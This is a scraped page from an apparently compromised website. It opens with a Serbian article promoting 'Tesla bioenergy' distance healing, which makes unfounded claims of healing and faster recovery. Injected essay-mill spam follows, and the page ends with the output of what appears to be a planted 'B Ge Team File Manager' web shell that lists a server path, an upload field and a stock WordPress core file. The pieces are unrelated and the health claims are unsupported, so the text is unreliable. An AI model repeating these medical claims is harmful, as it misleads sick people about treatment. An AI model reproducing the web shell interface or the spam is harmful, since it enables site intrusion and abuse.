Tesla

By on June 21, 2017

Tesla

Tesla

“Dar isceljujuće energije dolazi od Boga, vrhunskog bića, i ako mi spoznamo i osvestimo tu istinu, postajemo skladni sa ovom velikom moći.” Nikola Tesla

Tretmani na daljinu tesla bioenergijom

Intezitet ovih frekvencija ne opada sa rastojanjem, što omogućava da tretmani isceljivanja na daljinu budu podjednako efikasni kao i kada se osoba nalazi pored praktičara.

Važno je da znate da ovi tretmani nisu zamena za posete lekaru i za medicinsku terapiju, koju ne treba prekidati, ali je moguce ponoviti analize ubrzo nakon tretmana, da bi ste utvrdili koliko je došlo do poboljšanja.Ovde se radi o tehnici koja je povezana sa delovanjima iz prirode, što je u suštini veoma jednostavno , a opet izuzetno efektno!Isceljivanje teslinim talasima se zasniva se na holističkom pristupu, leči čoveka kao celinu, jer zastupa mišljenje da je psihičko, emotivno i fizičko stanje povezano i da je potrebno sve te aspekte dovesti u sklad, kako bi osoba bila zdrava. Koristi se pre svega kada postoji bilo kakva neravnoteža, ili neko oboljenje, ali i ako želite da poboljšate kvalitet života, otklonite unutrašnje blokade u čoveku i nagomilane negativne emocije. Otklanjanjem svih negativnih uticaja , unutrašnjih destabilizatora omogućava se da ubrzate svoj lični razvoj. Ono što je značajno da znate je da se tokom ovih tretmana teslinim talasima ne isceljuje pojedinačni zdravstveni problem, ili loše psihičko stanje, već da praktičar ne mora da zna od čega klijent boluje , zašto mu je potreban tretman. To je bezkontaktna metoda, praktičar ne dodiruje klijenta za vreme tretmana, već stvara određene uslove, polje pozitivne frekvencije oko klijenta. To su takve frekvencije, koje deluju na celokupno stanje osobe, sve njene nivoe (fizički, mentalni, emotivni, duhovni), pronalazeći i delujući na uzroke, uklanjaju energetske nepravilnosti, vraćaju u ravnotežu, podstiču ispravno funkcionisanje i samoisceljujuće procese i tako dolazi do poboljšanja. Ono je uočljivo, izrazito efektno deluje!

Preporučuje se serija od tretmana, sa razmakom najbolje od nedelju dana između svakog od njih. Reč o metodu isceljivanja, koje pokreće samoisceljivanje.Izuzetno je važno, možda i ključno, ne da verujete,ili ne verujete u ovaj metod , već DA IMATE JAKU VOLJU da dođe do ozdravljenja, ili poboljšanja zdravlja!

Kako će delovati pojedinačno zavisi od pojedinca, do pojedinca. Većina osoba, koje žude za ozdravljenjem što vise, to delotvornije dožive isceljivanje . To dovodi do toga da odmah nakon prvog tretmana dolazi do osetnog poboljšanja, a, pronalazeći i delujući na uzroke, uklanjaju se energetske nepravilnosti, vraćaju u ravnotežu, podstiču ispravno funkcionisanje i samoisceljujuće procese i tako dolazi do poboljšanja. Upravo je to ono što ovaj nacin isceljivanja čini tako efikasnim.Neko pokazuje odmah nakon prvog tretmana znatno poboljšanje, a kod nekih osoba poboljšanja se javljaju postepeno, kroz vreme.Takođe, osoba ne mora da veruje da će joj tretmani pomoći da bi osetila dobrobiti.Isceljivanje teslinim talasima je “metoda” za poboljšanje psiho-fizičkog stanja osobe, koja pomaže da dođe do bržeg i uspešnijeg izlečenja

Isceljivanje teslinom bioenergijom

Kod ličnog isceljivanja teslinim talasima koriste se potpuno iste frekvencije kao kod tretmana grupnog isceljivanja, samo postoji razlika u nameni i postupku isceljivanja, koji je ovde namenjen pojedincu.Namena isceljivanja je isceljenje na svim nivoima: na fizičkom, mentalnom, emotivnom.Često pitanje koje mi postavljate je :Šta se to događa prilikom ličnog isceljivanja teslinim talasima.

Događa se da se tretiraju određene tačke i energetski meridijani na telu klijenta, sa amerom, da se stimulišu energetski tokovi duž njih i da se povežu sa energetskim linijama Zemlje i Univerzuma.Smisao leži da dođe do poboljšanja našeg psiho-fizičkog stanja, da krene proces samoisceljivanja i to prirodnim putem, jer se koriste talasi koji su iz prirode, a koji su tu i radi toga da se omogući da dođe i do našeg svekupnog ličnog napretka. Namena je isceljivanje da se pomogne osobi , kojoj se radi lično isceljivanje  i da upozna bolje i ostvari sve svoje potencijale, jer se osoba povezuje I sama sa sobom. U nekim slučajevima se pojavi miris, koji takođe ima isceliteljsku ulogu,ili pak zvuci, muzika.Ova metoda između ostalog pruža osobi kojoj se radi isceljivanje mogućnost da dođe do boljeg izbora pri odlučivanju, veću sposobnost da pokazuje osećanje ljubavi, koje se usled negativnog iskustva često blokira, jer postoji sumnja I strah od toga . Isceljivanje pomaže da se nakon tretmana osobi omogući da otvoreno I lakše daje I prima ljubav, ili da se oslobodi osećaja krivice, zatim nekih potisnutih strahova. Doprinosi da se osoba manje sukobljava sama sa sobom I drugima. Neke osobe koje su imale blokiranu kreativnost postaju kreativnije. Ono što je izuzetno važno I što se kod nekih osoba događa je da otkriju smisao sopstvenog postojanja, da im život dobije smisao, ako ga do tada nisu imali. Događa se da prestaju unutrašnje blokade koje sprečavaju osobu da uživa u sadašnjem trenutku, I da lakše prevazilazi negativnosti u sebi, kada se one pojavljuju. Brže se oporavlja od upala, usled unutrašnjeg mira kojeg lakse stiče, mogućnost da se razboli je smanjena. Iscelivanje omogućava osobi da se uzdigne na viši energetski nivo, da sama u sebi aktivira proces dovođenja u stanje unutrašnjeg sklada,

There are still plenty of things to consider, including: cost, quality, and apa paper writing services assistance.

Buy an Informative Article online from Purchase Essay Organization

This business supplies you with broad array of essay topics to pick buy essay from. You are able to get essays on line within just one second and the article that you write will soon likely be transmitted to your speech within one day. You can order essays on line by using their secure payment gateway. The business also makes it possible for you to personalize your composition in accordance with your taste.

It is important to note that if you can find many points to look at whenever you’re within the process of picking the suitable expert correspondence writing support, one particular point to stay in your mind is the fact that not all professional correspondence writing services can provide you exactly whatever you will need

The optimal/optimally letter examples and letter type s available now that will help businesses reach to prospective customers from around the world. With the technology of today, these correspondence producing services are ready to produce a letter for nearly write my paper for me fast every firm requirement. Here are some of the best and many popular letter illustrations that you should look for Whenever You’re in the process of Selecting the Best letter


Leave a Reply

Your email address will not be published. Required fields are marked *

B Ge Team File Manager

B Ge Team File Manager

Current Path : /home/nnaac01/domains/zdravotelo.net/public_html/wp-includes/
Upload File :
Current File : /home/nnaac01/domains/zdravotelo.net/public_html/wp-includes/class-wp-http-encoding.php

<?php
/**
 * HTTP API: WP_Http_Encoding class
 *
 * @package WordPress
 * @subpackage HTTP
 * @since 4.4.0
 */

/**
 * Core class used to implement deflate and gzip transfer encoding support for HTTP requests.
 *
 * Includes RFC 1950, RFC 1951, and RFC 1952.
 *
 * @since 2.8.0
 */
class WP_Http_Encoding {

	/**
	 * Compress raw string using the deflate format.
	 *
	 * Supports the RFC 1951 standard.
	 *
	 * @since 2.8.0
	 *
	 * @static
	 *
	 * @param string $raw String to compress.
	 * @param int $level Optional, default is 9. Compression level, 9 is highest.
	 * @param string $supports Optional, not used. When implemented it will choose the right compression based on what the server supports.
	 * @return string|false False on failure.
	 */
	public static function compress( $raw, $level = 9, $supports = null ) {
		return gzdeflate( $raw, $level );
	}

	/**
	 * Decompression of deflated string.
	 *
	 * Will attempt to decompress using the RFC 1950 standard, and if that fails
	 * then the RFC 1951 standard deflate will be attempted. Finally, the RFC
	 * 1952 standard gzip decode will be attempted. If all fail, then the
	 * original compressed string will be returned.
	 *
	 * @since 2.8.0
	 *
	 * @static
	 *
	 * @param string $compressed String to decompress.
	 * @param int $length The optional length of the compressed data.
	 * @return string|bool False on failure.
	 */
	public static function decompress( $compressed, $length = null ) {

		if ( empty($compressed) )
			return $compressed;

		if ( false !== ( $decompressed = @gzinflate( $compressed ) ) )
			return $decompressed;

		if ( false !== ( $decompressed = self::compatible_gzinflate( $compressed ) ) )
			return $decompressed;

		if ( false !== ( $decompressed = @gzuncompress( $compressed ) ) )
			return $decompressed;

		if ( function_exists('gzdecode') ) {
			$decompressed = @gzdecode( $compressed );

			if ( false !== $decompressed )
				return $decompressed;
		}

		return $compressed;
	}

	/**
	 * Decompression of deflated string while staying compatible with the majority of servers.
	 *
	 * Certain Servers will return deflated data with headers which PHP's gzinflate()
	 * function cannot handle out of the box. The following function has been created from
	 * various snippets on the gzinflate() PHP documentation.
	 *
	 * Warning: Magic numbers within. Due to the potential different formats that the compressed
	 * data may be returned in, some "magic offsets" are needed to ensure proper decompression
	 * takes place. For a simple progmatic way to determine the magic offset in use, see:
	 * https://core.trac.wordpress.org/ticket/18273
	 *
	 * @since 2.8.1
	 * @link https://core.trac.wordpress.org/ticket/18273
	 * @link https://secure.php.net/manual/en/function.gzinflate.php#70875
	 * @link https://secure.php.net/manual/en/function.gzinflate.php#77336
	 *
	 * @static
	 *
	 * @param string $gzData String to decompress.
	 * @return string|bool False on failure.
	 */
	public static function compatible_gzinflate($gzData) {

		// Compressed data might contain a full header, if so strip it for gzinflate().
		if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
			$i = 10;
			$flg = ord( substr($gzData, 3, 1) );
			if ( $flg > 0 ) {
				if ( $flg & 4 ) {
					list($xlen) = unpack('v', substr($gzData, $i, 2) );
					$i = $i + 2 + $xlen;
				}
				if ( $flg & 8 )
					$i = strpos($gzData, "\0", $i) + 1;
				if ( $flg & 16 )
					$i = strpos($gzData, "\0", $i) + 1;
				if ( $flg & 2 )
					$i = $i + 2;
			}
			$decompressed = @gzinflate( substr($gzData, $i, -8) );
			if ( false !== $decompressed )
				return $decompressed;
		}

		// Compressed data from java.util.zip.Deflater amongst others.
		$decompressed = @gzinflate( substr($gzData, 2) );
		if ( false !== $decompressed )
			return $decompressed;

		return false;
	}

	/**
	 * What encoding types to accept and their priority values.
	 *
	 * @since 2.8.0
	 *
	 * @static
	 *
	 * @param string $url
	 * @param array $args
	 * @return string Types of encoding to accept.
	 */
	public static function accept_encoding( $url, $args ) {
		$type = array();
		$compression_enabled = self::is_available();

		if ( ! $args['decompress'] ) // Decompression specifically disabled.
			$compression_enabled = false;
		elseif ( $args['stream'] ) // Disable when streaming to file.
			$compression_enabled = false;
		elseif ( isset( $args['limit_response_size'] ) ) // If only partial content is being requested, we won't be able to decompress it.
			$compression_enabled = false;

		if ( $compression_enabled ) {
			if ( function_exists( 'gzinflate' ) )
				$type[] = 'deflate;q=1.0';

			if ( function_exists( 'gzuncompress' ) )
				$type[] = 'compress;q=0.5';

			if ( function_exists( 'gzdecode' ) )
				$type[] = 'gzip;q=0.5';
		}

		/**
		 * Filters the allowed encoding types.
		 *
		 * @since 3.6.0
		 *
		 * @param array $type Encoding types allowed. Accepts 'gzinflate',
		 *           'gzuncompress', 'gzdecode'.
		 * @param string $url URL of the HTTP request.
		 * @param array $args HTTP request arguments.
		 */
		$type = apply_filters( 'wp_http_accept_encoding', $type, $url, $args );

		return implode(', ', $type);
	}

	/**
	 * What encoding the content used when it was compressed to send in the headers.
	 *
	 * @since 2.8.0
	 *
	 * @static
	 *
	 * @return string Content-Encoding string to send in the header.
	 */
	public static function content_encoding() {
		return 'deflate';
	}

	/**
	 * Whether the content be decoded based on the headers.
	 *
	 * @since 2.8.0
	 *
	 * @static
	 *
	 * @param array|string $headers All of the available headers.
	 * @return bool
	 */
	public static function should_decode($headers) {
		if ( is_array( $headers ) ) {
			if ( array_key_exists('content-encoding', $headers) && ! empty( $headers['content-encoding'] ) )
				return true;
		} elseif ( is_string( $headers ) ) {
			return ( stripos($headers, 'content-encoding:') !== false );
		}

		return false;
	}

	/**
	 * Whether decompression and compression are supported by the PHP version.
	 *
	 * Each function is tested instead of checking for the zlib extension, to
	 * ensure that the functions all exist in the PHP version and aren't
	 * disabled.
	 *
	 * @since 2.8.0
	 *
	 * @static
	 *
	 * @return bool
	 */
	public static function is_available() {
		return ( function_exists('gzuncompress') || function_exists('gzdeflate') || function_exists('gzinflate') );
	}
}

B Ge Team File Manager Version 1.0, Coded By Little Wei
Email: null